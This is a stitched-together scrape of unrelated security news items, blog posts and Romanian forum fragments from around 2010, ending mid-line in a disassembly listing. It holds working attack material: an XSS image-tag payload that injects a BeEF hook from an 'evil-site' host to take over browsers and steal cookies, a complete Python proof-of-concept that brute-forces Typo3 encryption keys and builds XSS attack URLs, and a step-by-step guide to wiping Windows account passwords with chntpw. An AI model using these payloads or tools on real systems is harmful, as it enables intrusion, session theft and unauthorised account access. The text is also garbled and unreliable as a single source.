begood

For all the credit Facebook has received for its privacy controls and user safety, the site still falls prey to an unsettling number of security issues and potential data breaches. Last month a botched code push accidentally revealed private user email addresses, and before that Facebook accidentally sent private messages to the wrong recipients. Today, security engineer Joey Tyson, AKA theharmonyguy, has detailed a major security hole in Facebook Platform — one that would allow a malicious website to silently access a user’s profile information, photos, and in some cases, messages and wall posts, with no action required on the user’s part. The exploit, which we’ve confirmed has now been patched, could hijack the session of a previously authorized third party Facebook application and invisibly pass it off to a malicious app. In his proof-of-concept, Tyson embedded Farmville in an invisible frame on his site. He then used some trickery with Facebook Platform parameters to pass all access rights Farmville had on to a malicious data harvesting application. In short, any of the many millions of people who had previously installed Farmville and visited the apparently benign proof-of-concept site would have their data invisibly harvested. If the user had granted Farmville additional permissions to access their Wall or messages, then the malicious app would have them too. Tyson only used Farmville in this instance because of its massive install base, but he could have used any other third party app. Fortunately, Tyson doesn’t have reason to believe this exploit has been abused, stating “It’s unlikely that any real-world attacks used this particular vulnerability, and I certainly have no record of such a case.” But he also notes that it may have existed for a year or longer. Further, Tyson thinks that Facebook still has problems with the way Platform is set up that expose it to vulnerabilities like this: For more technical details on how the exploit worked, check out Tyson’s post. Tyson has written quite a few other articles detailing flaws with Facebook security, including his Month of Facebook Bugs, which exposed some serious issues with Facebook Platform last October (he notes that some of these have since been fixed). Researcher Uncovers (Another) Major Facebook Security Exploit Facebook Platform Vulnerability Enabled Silent Data Harvesting | Social Hacking

distribuia virusi sub nickul sppy acum ceva timp pe forum. http://www.google.com/search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=sppy_hacker poate totusi vreti sa-l contactati ))))))))))

si cu "ce merge" ? ce folosesti pentru ddos ? cate pc-uri ? //le hub .. le2 : aveai deja ban pe forum. BAN. pa ratatovici.

PHP Shell's DiA/RRLF - 09.08.2007

The super-sleuth detectives in TV show CSI have some very nifty tools to help solve crimes. But the need to keep things interesting and wrap the show up in an hour means the technology used in each episode bears little resemblance to the work of real forensic experts. Or does it? When it comes to computer forensics, today's tools are becoming more advanced, leaving fewer places to hide information. This tension between fact and fiction took on a whole new dimension when Microsoft's police-only forensic toolkit was leaked on the internet. Reports say that it has more in common with CSI than The Bill. We're going to show you how to mimic Microsoft's offering using open-source software to unlock Windows accounts, investigate suspicious activity, see any file on a Windows disk and even peruse files that others believe have been permanently deleted. Forensic toolkit During November 2009, it was announced that someone had leaked Microsoft's secret crime-fighting software online. Described as a collection of programs linked by a sophisticated script, hackers and other cybercriminals had been dying to get their hands on it for some time. Now it's reportedly available to anyone brave enough to download and install it. The Computer Online Forensic Evidence Extractor (or COFEE for short) has been available to police forces since at least summer 2007, and is designed to gather forensic evidence at crime scenes and during raids from the still-running PCs of suspects and victims. COFEE reportedly takes the average police officer about 10 minutes to master, and comes supplied on a bootable USB pen drive. It enables trained officers to gather evidence from a running system without the need to call in cybercrime specialists, thereby speeding up investigations. The USB drive itself is said to contain a package of about 150 forensic programs that enable an investigator to record sensitive information like internet history files and complete practical tasks like deleting Windows passwords. It also enables them to upload the recorded data for further analysis. By April 2008, it was reportedly in use by over 2,000 law enforcement officers throughout 15 countries. At the time of the leak, Microsoft claimed that COFEE was nothing more than a collection of commercially available programs brought together in a single handy package, which it makes available free of charge (if hitherto secretly) to help combat computer crime. If that's true, then is it also possible to create your own version of COFEE using free, open source software that will grant you complete access to a Windows computer? The answer is a resounding yes, but we must stress that using what you're about to learn for malicious purposes on a computer you don't own isn't big and it's certainly not clever. Don't use the following information to try to hack other people's computers or networks. Without the in-depth knowledge required to cover your tracks, you'll be caught and will probably face prosecution. If you hack computer systems in the US and get caught, you should be prepared to undergo a one-sided extradition process and go through a judicial system that will put you on a par with hardened terrorists before forcing you to serve a long prison sentence. There are plenty of commercial computer forensics systems around these days, but many of them cost serious money or are only available to the police. However, the open source community has a solution in the form of a special Linux distribution called Backtrack 4. Introducing Backtrack 4 Backtrack 4 is based on a stripped-down version of Ubuntu Linux, which is a popular choice for home users because of its ease of installation and use. The makers of Backtrack 4 have stacked the application with special security and forensics tools. These make it extremely useful to network security specialists and police forces, as well as anyone interested in knowing exactly what's happening on their own networks and any second-hand machines they've bought. Despite being Linux-based, Backtrack will grant you complete access to data stored on computers running any version of Microsoft Windows. That's because Windows isn't running when Backtrack is booted from a DVD or USB pen drive. Linux can read Windows disks, but it doesn't obey the file permissions, so the machine's hard disk simply seems to contain a lot of files waiting to be accessed. As well as booting and running directly from a DVD as a Live CD installation that never installs on your computer, you can also install Backtrack on a hard disk as the only operating system, or next to an existing Windows installation. If you plan to install Backtrack on a USB pen, you'll need one with a minimum 2GB capacity. This booting option brings Backtrack closer to Microsoft's COFEE than any other option. First, you need to download the Backtrack 4 ISO file, which is just under 1.6GB. You can download it from the Backtrack site directly or click the 'Torrent' link on the same page. There are multiple sources from which you can leech parts of the file in parallel, so in practice it's faster to download the ISO as a torrent. Once the ISO has downloaded, use it to make a bootable DVD. We've listed a free and easy to use CD/DVD package capable of making bootable disks in the Resources section. When that's done, test your work by ensuring your BIOS is set to boot from CD/DVD before attempting to boot from your hard disk, then insert the DVD and reboot the PC. Select the option to boot with a screen resolution of 1,024 x 768. When Backtrack has booted, you'll see a command line. To start a desktop environment, enter the command startx and press [Enter]. After a few seconds, the standard KDE desktop will start. Find your way around Backtrack is loaded with all the obscure little utilities used by professional security consultants. Many of them are fiddly command-line programs, but a lot have graphical front ends that make them simple to use. Hover your mouse over the icons on the menu bar at the bottom of the desktop and KDE will tell you the name of each one. We'll use the names that appear when you do this to make thing easy to identify here. The network interface cards are designed for network security work, and are disabled by default when you boot up Backtrack. This is because if anyone (or anything) is listening to network traffic, the last thing you want to do is announce your presence by requesting an IP address over DHCP. To enable networking, click the black Konsole icon to open a terminal window, then enter the following command: /etc/init.d/networking start After a moment or two, during which lots of verbiage scrolls up the screen, open Firefox (the icon is next to the terminal on the menu bar) and enter Google as a URL. You should see the world's favourite search engine appear. Much like the Start button in Windows, the left-hand icon on the menu bar brings up the installed programs and system configuration options. This is called the K menu and is organised into subject areas. The one we're most interested in is the first: 'Backtrack'. Click on this and you'll see a submenu containing categories of hacking programs, with which Backtrack has been preloaded. Clicking one of these reveals nested subcategories right down to individual programs. Map the neighbourhood Let's begin by scanning the local network for hosts (another name for networked computers). Starting from the K menu, select 'Backtrack | Network Mapping | Identify Live Hosts | Autoscan'. A wizard will appear. Click 'Forward' and you'll be asked for the name of a network to scan. Leave this as 'Local network' and click 'Forward' again. The next screen asks where the network is located. We're scanning the local network, so accept the default of it being connected to your computer by clicking 'Forward' once more. Next, select the default network adaptor. This will usually be called 'eth0'. If you don't see any adaptors in the pull down menu, it's because you didn't start networking earlier. Close Autoscan, start networking and run Autoscan again. Click 'Forward' one last time to confirm what you've asked Autoscan to do, then maximise the user interface that appears so you can see everything. Autoscan now contacts every possible IP address on the local subnet to see if there's a machine connected to it. If there is, it adds an entry to the left-hand pane. Notice that in some cases, Autoscan can even tell you the username that's logged in. When you select a host, Autoscan will attempt to gain more information about it for you. A wizard will also appear, asking you to add it to the Autoscan online database. Cancel this. You can go between tabs between the interface's right-hand panes to display a summary of the machine, detailed information or an inventory. Autoscan works by sending a stream of specially crafted packets to each host in turn. These are designed to return information about the running system and can give away a surprising amount of information. Autoscan is a useful tool for detecting whether your neighbours are leeching your Wi-Fi, for example. If you don't recognise a host, it's probably an intruder – so up your security! Wipe passwords Logging into a Windows system is easy using Backtrack, even if you don't know any of the usernames or passwords that have been set up. That's because you can use a utility bundled with Backtrack to remove the password on any Windows account, including administrator accounts. This is possible because of a file called the SAM (Security Access Manager), which is normally locked by the Windows kernel so that no one else can read it. This is modifiable while Windows isn't running. First, we need to find out where the system's hard disk resides in Linux. To do this, click the Konqueror icon on the desktop menu bar. This will open the Konqueror desktop browser. Click the 'Storage media' link. If you don't see anything right away, press [F5] to refresh the view. Among the media that Backtrack knows about on your system, you'll see your hard disk. Click this and you'll see the folders in C:\, which is useful if you need to copy, add or modify files without logging into Windows directly. Now select the Home icon on the Konqueror toolbar (the one that's shaped like a house) and click the blue 'up' arrow next to it. Click the Media folder, and then the 'Hard disk' icon again. The location bar will change to give the name we must use to access the disk. It'll be something like '/media/disk' Now, from the Start menu, select 'Backtrack | Privilege Escalation | Password Attacks | Chntpw'. 'Chntpw' stands for 'Change NT Passwords' and it works on all versions of Windows. When you run the command, a terminal window opens. You can ignore the verbiage on the screen and enter the following command: chntpw -i /media/disk/Windows/System32/config/SAM The capitalisations are very important here – 'chntpw' is all lowercase. If your Windows partition is called something other than 'disk', put its name in place of this in the command. Press [Enter] and a text-based menu will appear. Select 'Option one' and press [Enter] again. This gives you a list of the Windows user accounts. Type the name of the account you want to change (taking care to use the correct case for each letter) and then press [Enter]. Chntpw displays lots of details about the account and gives you a number of options. Select 'Option one' and the password will be removed from the account. To exit, type ! and press [Enter], then press [Q] and hit [Enter] again. Chntpw will ask if you want to write the hive files. You do, so press [Y] followed by [Enter]. If you now reboot into Windows, you'll be able to log into the account you've changed without being prompted to enter a password. Recovering deleted files Many people believe that when they delete a file and then empty the Recycle Bin, it's gone for good – but this isn't the case. Windows, like all modern domestic OSes, simply marks the sectors on the disk occupied by the deleted file as available for future reuse. It would be inefficient to overwrite the data those sectors contain until new data is ready to be stored. In the meantime, the old file is still there, available to be read by anyone with access to a file recovery utility. Backtrack contains several such applications. Among the easier to use is PhotoRec, which is capable of scanning a hard disk and recovering a comprehensive list of all files marked as deleted. In fact, it can recover far more than just files deleted by users, including temporary files left over from when the operating system was installed. This means it's a good idea to have a spare USB pen drive handy to store the recovered files for later perusal, because they can easily run into the thousands. To get going, insert the drive and run Konqueror. Click 'Storage media' and then select your USB pen drive to ensure that Backtrack is aware of it. You can leave Konqueror open and check the scan's progress later. Now run PhotoRec by navigating to 'Backtrack | Digital Forensics | Forensic Analysis' and then selecting 'PhotoRec'. The program itself runs on the command line, but it's menu driven, making it easier to use. When PhotoRec runs, it first presents you with a list of the hard disk partitions on the computer. In the case of a Windows-only machine, there'll probably be only one large one. However, in some Windows 7 installations, there may be a second, small partition that the system uses to store recovery data. Use the up and down arrow keys to select the main partition, then press [Enter] to continue. PhotoRec can understand a large number of partition table types and will automatically identify the one used on your disk, so accept the default on the next screen by pressing [Enter] again. The next screen enables you to specify the file types to recover. Use the left and right arrow keys to highlight 'File Opt' at the bottom of the screen. Next, press [Enter]. The resultant display will give you a long list of all the recognised types. If you only want to recover one file type (JPG, for example), press to deselect everything, then scroll down to the relevant type and press [space]. You can use the [Page up] and [Page down] keys to navigate through the list more quickly. Once you're happy with your file type selections, press [Enter] and select the filesystem you want to scan. Use the left and right arrow keys to select the 'Search' option, then press [Enter]. This presents you with a choice of file system types. For a Windows filesystem, make sure you select 'Other', then press [Enter]. On the next screen, select 'Free' to ensure that the program only scans disk sectors that are marked as free space. Press [Enter] again to continue. You'll now be asked where to store the recovered files. The default is the directory '/usr/local/ bin', which is on the boot media. Press the left arrow key three times to get back to the root directory, then press the down arrow key repeatedly to navigate to the media directory. When you reach it, press [Enter] to see the media connected to the system. One of the devices you find should be the USB pen drive you inserted and navigated to in Konqueror just a moment ago. Select this and press [Enter] again. Finally, press [Y] to begin recovering deleted files. The extraction process can take quite a while, depending on how much free space there is to scan on the disk and the number of file types you've specified. As the scan progresses, the number of files of each type will increase. PhotoRec creates a long list of subfolders in which it stores all the files it's recovered. By perusing these, you may be able to locate some interesting or even incriminating pictures and other documents. How to create your own free computer forensics kit on a USB drive | News | TechRadar UK

Late Thursday night the U.K. Parliament passed the controversial Digital Economy Bill, which grants the U.K. government sweeping new powers to control access to the Internet. The Digital Economy Bill has been the subject of heavy entertainment industry lobbying and widespread concern amongst U.K. citizens and telecommunications companies because it included provisions that would allow the U.K. government to censor websites considered "likely to be used for or in connection with an activity that infringes copyright," and disconnect the Internet connection of any household in the U.K. with an IP address alleged to have engaged in copyright infringement. Despite the many concerns expressed with the Bill's provisions, including questions by some Members of Parliament about whether these provisions could be used to block access to the Wikileaks website, the bill was rushed through Parliament -- apparently with several amendments that we're still assessing -- after only two hours of debate in a special late-night "wash-up" session. If you're in the U.K., we encourage you to join the Open Rights Group's campaign and express your views to your MPs now. You might also want to switch to an Internet Service Provider that understands the implications of the Digital Economy Bill and is willing to commit to protecting your civil liberties, like Talk Talk. mai multe informatii U.K. Passes Internet Censorship and Disconnection Law | Electronic Frontier Foundation

SFX-SQLi (Select For XML SQL injection) is a new SQL injection technique which allows to extract the whole information of a Microsoft SQL Server 2005/2008 database in an extremely fast and efficient way. This technique is based on the FOR XML clause, which is able to convert the content of a table into a single string, so its contents could be appended to some field injecting a subquery into a vulnerable input of a web application. SFX-SQLi (Select For XML SQL injection)

There are the usual XSS tests. And then there are the fun ones. This is a story about a more exotic approach to testing XSS.... I was testing a company that had passed all XSS tests from their pentester. I found that they allowed users to write HTML tags. Of course they didn't permit <script> tags or <iframe> tags. (Well, they did allow those, but that was an oops - no server side filtering.) This company had whitelisted a variety of "safe" tags for use by clients. That's boring, right? Heh, thanks to Ron, I had a way to abuse their whitelist. (I've since found this in Web Application Hackers Handbook, but I seem to have overlooked it at the time I read it.) Three HTML 4 tags in particular allow javascript to be run from one of the elements and these are: <img>, <object>, and <style>. You are really unlikely to see <object> and <style> tags permitted, but <img> tags are a bit more common. Note: since my work on this site, I've seen RSnake's page and other pages that talk about using <img src="alert('XSS')">. That was nice in the past, but none of my current version browsers will execute that. (Makes me wonder if the whole tracking image thing from emails of yesteryear still works, but that's a rabbit trail. If you know, post a comment.) Still, just because I can't source the javascript, doesn't mean I can't execute javascript.... We'll use different HTML 4 elements. Now, in my scenario, I decided to input <img src="blah.jpg" onerror="alert('XSS')"/> and reloaded the page. BINGO! I got a popup box. This also works and has the advantage of a working image: <img src="realimage.png" onload="alert('XSS')"/>. That's cool. It's really easy to check that off on your list and say "vulnerable to XSS." But, can you do anything besides popping boxes? Doing something would be useful. I had a question about all this, "will these elements support more than an alert box or is this a useless novelty?" More tests were in order. So, then we could replace alert() with document.write() and write the cookie to our server. This swipes cookies and that's better than a popup. But why stop there? Why not create a <script> on the page itself? What's that you say? <script> isn't on the whitelist? So, your point? If your browser creates the <script> locally, it can't be filtered, now can it? Thanks to Mak (@mak_kolybabi) for giving me some of the tips I needed to get this going in the correct direction. How about we try this: <img onload="var s = document.createElement('script'); s.src='http://evil-site/beef/hook/beefmagic.js.php';document.getElementsByTagName('head')[0].appendChild(s);" src="real_image.jpg" /> We have a image that triggers the onload element. Now we tell the browser to create a script element. You may not be able to write <script>, but you are able to write the word "script." The createElement function tells the browser to create the <script></script>. It's local to the client and the server has no idea. Then we give the source element (what else would you use but BeEF?) and then we place our new element into the page. Viola! You've just turned a simple <img> tag into stored XSS.... I have noticed that using onload="local_function()," IE8 and FF3.6 have "issues." Not sure what it is quite yet. I spent a few moments looking around to see if I could locate websites that allow you to use HTML tags. From a cursory perspective, Slashdot is safe, so is Digg, and most forums are now using BB Code. So, how useful is this? I'd wager it's probably a last resort. If you chained attacks you could potentially use it. Suppose you bypassed the front line of defense (like so) in a manner that allowed you to write tags, but ran into some sort of whitelist filtering on the server preventing <script> tags. Now you have a way to create script tags while evading the filter. We're not done yet.... Now, you might think that all of this is trivial and not very important. I mean seriously, who allows users to write tags at all? Let's look forward for a moment. HTML5 is coming. According to this site (and I have to think that they would know), we find this beautiful bit of information: all event handlers must be supported by all elements, or something like that. And there are a bunch of new event handlers. In other words, not only do we have access to onload/onerror in every element, we get lots more.... Stored XSS will be everywhere for years. All these wannabe web guys who implement the cool new whizbang HTML5 as soon as it ships, will be running huge risks unless they carefully filter out event handlers. (At least they need to prevent users from implementing event handlers.) We've seen how well this has worked in the past, so my hopes for reasonably secure implementation are exactly nonexistent. And if you have a site that you want to allow users to write tags, try switching to BB Code. It's safer. Well, in 10 minutes of testing I didn't see how to bypass it as it doesn't support anything. Currently, I am developing a page that will test a browser's support of HTML 5 action events. If you have suggestions or tips, send them my way. I'm currently muddling through my coding. Oh and just think about what would happen if someone accidentally on purpose managed to rewrite the <img> element on Digg - The Latest News Headlines, Videos and Images or Google. Would anyone ever notice? How long would it take to find it? Seriously, looking for a compromise, who'd look at the official logo for the infection? Enjoy your nightmares people. SkullSecurity Blog Archive Exotic XSS: The HTML Image Tag

This short screen capture demonstrates the use of the Typo3 Encryption Key tool found on c22.cc. This tool exploits the weak encryption key found in versions 4.2.3 and earlier of Typo3 (see Typo3-sa-2009-001 / Insecure Randomness vulnerability). Typo3 Encryption Key Attack on Vimeo original script location : Tools/Scripts ©????²² (in)s??u?it? TYPO3EncKeyTool.py # TYPO3 Encryption Key - Proof of Concept # # Chris John Riley # blog.c22.cc # contact@c22.cc # 16/12/2008 (23/01/2009) # Version: 1.23 # # Changelog # 1.23 --> Small corrections # 1.22 --> Fixed mistake in the attack string creation. Changed bodytag to bodyTag to corect mismatching MD5 results. import hashlib import urllib import getopt import sys import re from string import split from urlparse import urlparse dictionary = '' file= '' width = '' height = '' effects = '' bodytag = '' title = '' wrap = '' md5 = '' def main(): global file global width global height global effects global bodytag global title global wrap global md5 global enckey success = '' i = 0 urlquery = url.query.split('&') print " Base URL | ", baseurl while i < len(urlquery): # Loop through each part of the query urlsplit = urlquery[i].partition('=') j = 0 # Loop through to split the variables and values from the URL while j < (len(urlsplit)): if urlsplit[j].lower() in ("file", "width", "height", "effects", "bodytag", "title", "wrap", "md5"): if (urlsplit[j].lower() == "file"): file = urlsplit[j+2] # When split using partition the out put is "file" "=" "value" - j+2 is used to skip the "=" and set the value print " file | ", file elif (urlsplit[j].lower() == "width"): width = urlsplit[j+2] print " width | ", width elif (urlsplit[j].lower() == "height"): height = urlsplit[j+2] print " height | ", height elif (urlsplit[j].lower() == "effects"): effects = urlsplit[j+2] print " effects | ", effects elif (urlsplit[j].lower() == "bodytag"): bodytag = urlsplit[j+2] print " bodytag | ", bodytag elif (urlsplit[j].lower() == "title"): title = urlsplit[j+2] print " title | ", title elif (urlsplit[j].lower() == "wrap"): wrap = urlsplit[j+2] print " wrap | ", wrap elif (urlsplit[j].lower() == "md5"): md5 = urlsplit[j+2] print " md5 | ", md5 else: break else: break j = j+1 i = i+1 urlreform = urllib.unquote_plus("|".join((file, width, height, effects, bodytag, title, wrap)) +'|') print "\n" +"-" *80 print " Attempting to find a matching MD5" print "-" *80 print " Test string | ", urlreform +"<BRUTE-FORCE>|" print "-" *80 print " Desired MD5 | ", md5 print "-" *80 if default == True: # Attempt to check default Typo3 Encryption keys print "\n" +" Beginning default Encryption Key attack" y = 0 while y < 1000: # This section performs the MD5 hashing and comparison # By recreating the hash and comparing against the original from the URL # the Encryption Key can be recovered / brute-forced # Details on the process used can be found in the paper discussing the vulnerability md5def1 = hashlib.md5(str(y)) md5def2 = hashlib.md5(md5def1.hexdigest()) md5def3 = "".join((md5def1.hexdigest(), md5def2.hexdigest())) md5def4 = hashlib.md5(md5def3) md5def5 = "".join((md5def3, md5def4.hexdigest())) testinput = "".join((urlreform, md5def5)) +'|' testresult = hashlib.md5(testinput) if testresult.hexdigest() == md5: # Match brute-forced MD5 against the one from the URL success = True break y = y+1 if success: enckey = md5def5 print "\n" +"_" *80 print "=" *80 print "-" *80 print "\n Default Hash found is", md5def5 print "\n" +"_" *80 print "=" *80 print "-" *80 change = raw_input(' Do you want to use this Encryption key to create a new URL (y/n): ') if change == 'y': createlink() # Create valid URL using the recovered Encryption Key else: sys.exit() else: if dictionary == True: print "\n Default Hash not found. Proceeding to dictionary attack" else: print "\n Default Hash not found." if dictionary == True: # Attempt to brute-force the Encryption Key using a dictionary file print " Using dictionary file = ", dictfile try: for word in open(dictfile): # Loop through words in the file word = word.rstrip('\n') # Strip new line characters testinput = "".join((urlreform, word)) +'|' # Combine the word before creating the MD5 hash testresult = hashlib.md5(testinput) if testresult.hexdigest() == md5: # Compare the created hash to the one from the URL success = True break if success: enckey = word print "\n" +"_" *80 print "=" *80 print "-" *80 print "\n Encryption Key recovered .:", word print "\n" +"_" *80 print "=" *80 print "-" *80 change = raw_input(' Do you want to use this Encryption key to create a new URL (y/n): ') if change == 'y': createlink() # Create valid URL using the recovered Encryption Key else: sys.exit() else: print "-" *80 print " Encryption Key not found" print "-" *80 except IOError: print dictfile, "not found!" def usage(): print "\n\n" +"-" *80 print " Typo3 Encryption Key Tool" print "\n Version 1.22" print "-" *80 print "\n www.c22.cc" print "\n This Proof of Concept script takes input in the form of a" print " TYPO3 URL (specifically one using the tx_cms_showpic class)" print " The script will then perform a check against known default" print " Encryption Keys or use a dictionary file to perform a brute" print " force attack in an attempt to recover the Encryption Key in" print " use on the remote server. Once the Encrpytion Key is recovered" print " the option is given to insert an attack string (i.e. XSS)" print " into the wrap element of the URL passed to the command line." print " the script will then recalculate a valid MD5 using the recovered" print " Encryption Key and provide a valid attack URL to the user." print "\n\n Usage .:" print "\n -u / --url <'Complete URL within single quotes'>" print " -f / --file <Path to dictionary file>" print " -d / --default <Check against the default encryption keys>" print "" def createlink(): # Once the Encryption Key has been recovered / brute-forced, it's possible to alter the original URL to contain attack code (XSS code, etc..) # This section recreates the URI with a valid MD5 (created using the Encryption Key) print "\n Please insert your desired attack string." print " This string will be inserted into the" print " wrap section of the URL" attackstring = raw_input ('===> ') # Input attack code print " inserting", attackstring, "into the wrap tag" attackurl = "file=", file, "&width=", width, "&height=", height, "&effects=", effects, "&bodyTag=", bodytag, "&title=", title, "&wrap=", attackstring, "&md5=" attackurl = urllib.unquote_plus("".join((attackurl))) # Link all variables together before creating the new MD5 attackmd5 = urllib.unquote_plus("|".join((file, width, height, effects, bodytag, title, attackstring, enckey)) +'|') print attackmd5 attackmd5 = hashlib.md5(str(attackmd5)) attackmd5 = attackmd5.hexdigest() # We now have the newly created MD5 attackurl = "".join((str(attackurl), str(attackmd5))) attackurl = "".join((attackurl)) attackurl = "&".join((baseurl, attackurl)) print "\n" +"_" *80 print "=" *80 print "-" *80 +"\n" print " Attack string .:\n\n" # Attack string is output with newly created MD5 hash print "", attackurl print "\n" +"_" *80 print "=" *80 print "-" *80 try: opts, args = getopt.getopt(sys.argv[1:], "u:f:dh", ["url=", "file=", "default", "help"]) except getopt.GetoptError: usage() sys.exit(2) if len(sys.argv) < 4: usage() sys.exit(2) for opt, arg in opts: if opt in ("-h", "--help"): usage() sys.exit() elif opt in ("-u", "--url"): url = urlparse(arg, scheme='http', allow_fragments=False) eID = url.query.split('&')[0] baseurl = "?".join((("".join((("://".join((url.scheme, url.netloc))), url.path))), eID)) # Recreate the URL up to the end of the eID parameter elif opt in ("-f", "--file"): dictfile = arg dictionary = True elif opt in ("-d", "--default"): # Check that the Typo3 Encryption key isn't set to a default value default = True print "\n" +"_"*80 print "-"*80 print "\n" +" TYPO3 4.2.3 Offline Encryption Key brute forcer" print " Chris John Riley (blog.c22.cc)" print " Version 1.23 (March 2010)" print "\n" +"_"*80 print "-"*80 print "\n" +" Data extracted from URL .:" print "" if __name__== '__main__': main()

ba a terminat, fmm

Described in 1971, made in 2008: 'memristors' promise a computer revolution. High-school physics students grappling with the delights of capacitors, inductors and resistors will be groaning into their exercise books. Electronics experts in California have finally succeeded in proving the existence of a fourth fundamental unit of electronic circuits: the 'memristor'. The existence of the memristor, short for 'memory resistor', was first suggested in 1971, but only now have researchers succeeded in creating a real, working example. They hope that the new components could revolutionize computing, promising an end to frustrating waits for your computer to boot up. "A memristor is essentially a resistor with memory," explains Stan Williams of HP Labs in Palo Alto, California, who reports the memristor's creation in this week's Nature1. "The actual resistance of the memristor changes depending on the amount of voltage and the time for which that voltage has been applied to the device." That means that a computer created from memristive circuits can 'remember' what has happened to it previously, and freeze that memory when the circuit is turned off. This quality could allow computers to turn off and on again in an instant, as all the components could revert to their last state instantly, rather than having to 'boot up'. http://www.physorg.com/news190016024.html Found: the missing circuit element : Nature News

Since yesterday we are seeing a large number of Wordpress blogs (running the latest version 2.9.2) getting infected with malware. None of them are using the same plugins or the same themes. Some of them even have wp-admin access blocked to only a few IPs and via htpasswd password. The only similarity between them is that they are all shared hosts at Network Solutions. Some of our clients spoke with Network Solutions and they confirmed that all their Wordpress sites are having issues, but their servers are clean (are they?). What is interesting about this attack is that it does not create or modify any files, so the average security advice does not apply here. The only thing is does is to modify your "siteurl" inside the "wp-option" table to point to http://networkads.net/grep/, breaking the site layout completely. That's how it looks like in the database: (2, 0, 'siteurl', '<iframe style=\"display:none\" height=\"0\" width=\" 1\" src=\"http://networkads.net/grep/\"></iframe>', 'yes'), The only way for the database to be modified like that is via SQL injection or a bigger problem inside Network Solutions databases. Anyone else having this issue? If you are, let us know about it. *To fix this issue, just revert your siteurl back to the previous value. Log in to your control panel, go to manage database, and edit the siteurl value on the wp-option table. **If you need help cleaning this up, send us an email dd@sucuri.net Update 1: More Network solution users affected: Same thing -- some HTML inserted into the siteurl field in the wp_options table, and I can't get to my login page. I hadn't upgraded to 2.9.2 yet, and the site's not using SimplePress forum. So it's not just 2.9.2 that is affected, if that helps at all. And here: My site njnnetwork.com got hacked yesterday morning. After a series of non-productive tasks all day, Network Solutions admitted they have been hacked on many WordPress sites. Here as well: They changed my wp-options siteurl to be an iframe pointing to networkads.net/grep The site was not loading correctly so I was able to find this in phpmyadmin. I have had a rash of hacks lately and talked to Network Solutions (my host) They tell me all of their wordpress sites are getting banged up, but their servers are clean. And many more at the Wordpress forums. Sucuri Security: Mass infection of Wordpress blogs at Network Solutions

There is a serious vulnerability in Java that leaves users running any of the current versions of Windows open to simple Web-based attacks that could lead to a complete compromise of the affected system. Two separate researchers released information on the vulnerability on Friday, saying that it has been present in Java for years. The problem lies in the Java Web Start framework, a technology that Sun Microsystems developed to enable the simplified deployment of Java applications. In essence, the JavaWS technology fails to validate parameters passed to it from the command line, and attackers can control those parameters using specific HTML tags on a Web page, researcher Ruben Santamarta said in an advisory posted Friday morning. Tavis Ormandy posted an advisory about the same bug to the Full Disclosure mailing list on Friday as well. Ormandy said in his advisory that disabling the Java plugin is not enough to prevent exploitation, because the vulnerable component is installed separately. Recommended Reads * Serious New Java Flaw Affects All Current Versions of Windows * 93 Vulnerabilities Found in VMware * Is your Java up to date? Get News by Email! In short, if you have a recent version of Java running on a Windows machine, you're affected by this flaw. "Java.exe and javaw.exe support an undocumented-hidden command-line parameter "-XXaltjvm" and curiosly also "-J-XXaltjvm" (see -J switch in javaws.exe). This instructs Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil , in this way javaw.exe will load our evil jvm.dll. Bye bye ASLR, DEP...," Santamarta said in his advisory. Because the JavaWS technology is included in the Java Runtime Environment, which is used by all of the major browsers, the vulnerability affects all of these applications, including Firefox, Internet Explorer and Chrome, on all versions of Windows from 2000 through Windows 7, Santamarta said. Browsers running on Apple's Mac OS X are not vulnerable. In his advisory, Ormandy said that he notified Sun about the vulnerability but that the vendor didn't believe it was serious enough to warrant an emergency patch. "The toolkit provides only minimal validation of the URL parameter, allowing us to pass arbitrary parameters to the javaws utility, which provides enough functionality via command line arguments to allow this error to be exploited. The simplicity with which this error can be discovered has convinced me that releasing this document is in the best interest of everyone except the vendor," Ormandy said. The workaround for this problem is to disable JavaWS and Javaws.exe, Santamarta said in his advisory. Ormandy has set up a proof-of-concept URL, included in his advisory, that demonstrates the exploit. Julien Tinnes has more information about this class of Java vulnerability. Serious New Java Flaw Affects All Current Versions of Windows | threatpost

Written by Rubén Friday, 09 April 2010 Updated Just in case: Tavis' attack also allows remote code execution since the jar is executing without any restriction. Updated Although Linux contains vulnerable code, I was unable to exploit it in the same manner. It likely can be exploited by using the proper sequence of command-line arguments, but the sudden release didn't allow me to research into this issue.I was focused on Windows at the moment of the disclosure. Bye bye my little 0day , Tavis Ormandy did a great job uncovering a big logic flaw within Java JRE. I discovered that bug and other that affects every browser few weeks ago so I posted the common "0day++" tweet. The method by which Java Web Start support has been added to the JRE is not less than a deliberately embedded backdoor(I really don't think so) or a flagrant case of extreme negligence (+1). It's even more incredible that Sun didn't assess the real risk of this flaw after Tavis reported it to them. Let's see: Java Plugin for Browsers (Chrome,Firefox...) - Windows: npjp2.dll (The same for IE8's jp2iexp.dll) .text:6DAA3D96 .text:6DAA3D96 ; =============== S U B R O U T I N E ======================================= .text:6DAA3D96 .text:6DAA3D96 ; Attributes: bp-based frame .text:6DAA3D96 .text:6DAA3D96 sub_6DAA3D96 proc near ; CODE XREF: sub_6DAA2ACB+170p .text:6DAA3D96 .text:6DAA3D96 Data = byte ptr -264h .text:6DAA3D96 var_263 = byte ptr -263h .text:6DAA3D96 ApplicationName = byte ptr -160h .text:6DAA3D96 StartupInfo = _STARTUPINFOA ptr -5Ch .text:6DAA3D96 ProcessInformation= _PROCESS_INFORMATION ptr -18h .text:6DAA3D96 cbData = dword ptr -8 .text:6DAA3D96 hKey = dword ptr -4 .text:6DAA3D96 arg_0 = dword ptr 8 .text:6DAA3D96 arg_4 = dword ptr 0Ch .text:6DAA3D96 .text:6DAA3D96 push ebp .text:6DAA3D97 mov ebp, esp .text:6DAA3D99 sub esp, 264h .text:6DAA3D9F push edi .text:6DAA3DA0 lea eax, [ebp+hKey] .text:6DAA3DA3 push eax ; phkResult .text:6DAA3DA4 push 20019h ; samDesired .text:6DAA3DA9 xor edi, edi .text:6DAA3DAB push edi ; ulOptions .text:6DAA3DAC push offset SubKey ; "JNLPFile\\Shell\\Open\\Command" .text:6DAA3DB1 push 80000000h ; hKey .text:6DAA3DB6 mov [ebp+cbData], 104h .text:6DAA3DBD call ds:RegOpenKeyExA .text:6DAA3DC3 test eax, eax .text:6DAA3DC5 jz short loc_6DAA3DCE .text:6DAA3DC7 xor eax, eax .text:6DAA3DC9 jmp loc_6DAA3F16 The default handler is "javaws.exe",continuing... .text:6DAA3EB7 push 